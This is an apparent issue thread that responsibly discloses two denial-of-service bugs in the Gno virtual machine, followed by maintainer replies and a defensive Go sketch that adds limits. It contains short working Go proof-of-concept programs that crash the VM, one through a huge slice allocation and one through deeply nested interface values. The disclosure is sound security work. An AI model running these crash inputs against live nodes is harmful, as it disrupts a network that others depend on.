Two critical VM issues (denial of service attacks)
Hey everyone, I am a Web3 cybersecurity researcher working for Hacken, specializing in layer 1 protocols and virtual machines. I met with the Gno team during Web3 Summit in Berlin, where they introduced me to your project. I promised to check it out because it sounded very interesting to me. I spent a day playing with your project and virtual machine and managed to find two ways to crash it.
Critical issues
- Crashing VM due to out-of-memory error by allocating a huge slice:
```go
package main

func main() {
	// Requests one trillion ints (about 8 TB) in a single make call.
	buffer := make([]int, 1_000_000_000_000)
	buffer[1] = 1
}
```
- Crashing VM by creating very deep structure which is very CPU-intensive to process:
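```go
package main

func init() {
	var x interface{}
	// Each iteration wraps the previous value one level deeper; the loop never ends.
	for {
		x = [1]interface{}{x}
	}
}

func main() {}
```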
or alternatively:
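```go
package main

func main() {
	var x interface{}
	// Build a value nested 10000 levels deep.
	for i := 0; i < 10000; i++ {
		x = [1]interface{}{x}
	}
	// Printing walks the whole nesting on every call.
	for i := 0; i < 10000; i++ {
		println(x)
	}
}
```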
I used the following test to reproduce these issues: crash_test.go.zip. You should put it in `gno.land/pkg/sdk/vm` and run it there with `go test -v -run TestVMCrash`.
Next steps
I highly recommend introducing fuzzing in your project and undergoing a full audit before launching your product.
Feel free to contact me here or by sending an email to [email protected] if you need any help.
I'll take a stab at solving the first issue listed here
- Crashing VM due to out-of-memory error by allocating a huge slice:
First issue has been fixed.
The second issue needs to be triaged to determine if it poses a critical threat for the chain at launch.
Confirming the second one is still an issue and affects actual running nodes; sorry for the delay.
I'll create a second issue for the second one so we can more appropriately track it with a proper name.
Superseded #3471
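As an added illustration (not code from this thread and not Gno's actual fix), the two crash classes reported above can be bounded by charging an allocation against a budget before reserving memory and by capping how deep a print may descend. The names `Allocator`, `MakeInts`, `SprintBounded` and both limits are hypothetical.

```go
package main

import (
	"errors"
	"fmt"
	"math"
)

// Hypothetical limits for this sketch; a real VM would tie them to gas or node config.
const (
	maxAllocBytes = 64 << 20 // bytes one transaction may allocate
	maxPrintDepth = 64       // nesting levels one print may descend
)
var errAllocLimit = errors.New("allocation limit exceeded")
// Allocator charges each request against the budget before any memory is reserved.
type Allocator struct{ used int64 }

// MakeInts is a guarded make([]int, n): it rejects negative, overflowing and over-budget sizes.
func (a *Allocator) MakeInts(n int64) ([]int, error) {
	const elemSize = 8 // bytes per int on 64-bit targets
	if n < 0 || n > math.MaxInt64/elemSize || n*elemSize > maxAllocBytes-a.used {
		return nil, errAllocLimit
	}
	a.used += n * elemSize
	return make([]int, n), nil
}

// SprintBounded walks nested [1]interface{} values iteratively and gives up at maxPrintDepth.
func SprintBounded(v interface{}) string {
	for depth := 0; ; depth++ {
		arr, ok := v.([1]interface{})
		if !ok {
			return fmt.Sprintf("depth=%d leaf=%v", depth, v)
		}
		if depth == maxPrintDepth {
			return fmt.Sprintf("<truncated at depth %d>", depth)
		}
		v = arr[0]
	}
}

func main() {
	_, err := new(Allocator).MakeInts(1_000_000_000_000) // size from the first report
	var x interface{}
	for i := 0; i < 10000; i++ { // depth from the second report
		x = [1]interface{}{x}
	}
	fmt.Println(err, "|", SprintBounded(x))
}
```

The size check runs before `make`, so an oversized request costs no memory, and the printer does at most `maxPrintDepth` steps per call regardless of how deep the value is.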